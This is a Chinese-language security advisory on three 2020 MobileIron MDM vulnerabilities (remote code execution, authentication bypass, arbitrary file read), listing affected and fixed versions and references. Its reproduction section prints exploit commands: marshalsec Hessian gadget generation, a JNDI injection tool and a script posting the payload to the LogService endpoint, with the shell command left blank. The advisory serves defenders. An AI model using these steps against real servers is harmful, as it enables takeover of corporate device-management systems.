首頁 > 安全研究 > 安全通報 > 安全通告

MobileIron | 11月MDM多個安全漏洞通告

發布時間 2020-11-26

0x00 漏洞概述

產品名稱

CVE ID

類 型

漏洞等級

遠程利用

MobileIron Core &   Connector、Sentry、Monitor and Reporting Database   (RDB)

CVE-2020-15505

RCE

嚴重

MobileIron Core&Connector

CVE-2020-15506

身份驗證繞過

嚴重

MobileIron Core

CVE-2020-15507

任意文件讀取

高危

 

0x01 漏洞詳情

 

image.png

 

MobileIron是全球領先且發展最迅速的移動IT解決方案廠商之一,在全球有近20000家公司使用MobileIron的移動設備管理解決方案(MDM)。

2020年10月22日,MobileIron發布更新公告,MDM中存在的多個安全漏洞(CVE-2020-15505、CVE-2020-15506和CVE-2020-15507)已在6月15日發布的補丁中被修復。漏洞詳情如下: 

MobileIron遠程代碼執行漏洞(CVE-2020-15505)

該漏洞是MobileIron移動設備管理(MDM)中的一個遠程代碼執行漏洞,其CVSS評分9.8。攻擊者可以利用此漏洞執行任意代碼并控制公司的服務器。

該漏洞的PoC已于9月在Github上被公布。近日,該漏洞正在被APT組織和網絡犯罪組織積極嘗試利用。

 

漏洞復現:

Groovy反序列化小工具

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

image.png

 

本地JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

image.png

image.png

 

影響范圍:

MobileIron Core&Connector:10.3.0.3及之前版本、10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3、10.5.1.0、10.5.2.0、10.6.0.0

Sentry:9.7.2及之前版本、9.8.0

Monitor and Reporting Database (RDB):2.0.0.1及之前版本

 

 

MobileIron身份驗證繞過漏洞(CVE-2020-15506)

該漏洞是MobileIron移動設備管理(MDM)中的一個身份驗證繞過漏洞,其CVSS評分9.8。攻擊者可利用此漏洞繞過身份驗證機制。

影響范圍:

MobileIron Core&Connector:

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

 

 

MobileIron任意文件讀取漏洞(CVE-2020-15507)

該漏洞是MobileIron移動設備管理(MDM)中的一個任意文件讀取漏洞,其CVSS評分7.5。攻擊者可利用此漏洞讀取文件系統中的敏感信息。

影響范圍:

MobileIron Core

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

 

 

0x02 處置建議

目前MobileIron已經發布了相關更新,建議參升級至如下版本。

MobileIron Core & Enterprise Connector

v10.3.0.4、v10.4.0.4、v10.5.1.1、v10.5.2.1、v10.6.0.或更高版本。

MobileIron Sentry

v9.7.3、v9.8.1或更高版本。

MobileIron Monitor and Reporting Database (RDB)

v2.0.0.2或更高版本。

 

補丁鏈接:

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

 

0x03 參考鏈接

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

 

0x04 時間線

2020-07-01  MobileIron發布安全公告

2020-10-22  MobileIron更新安全公告

2020-11-26  VSRC發布安全通告

 

0x05 附錄

 

CVSS評分標準官網:http://www.first.org/cvss/

image.png

上一篇 下一篇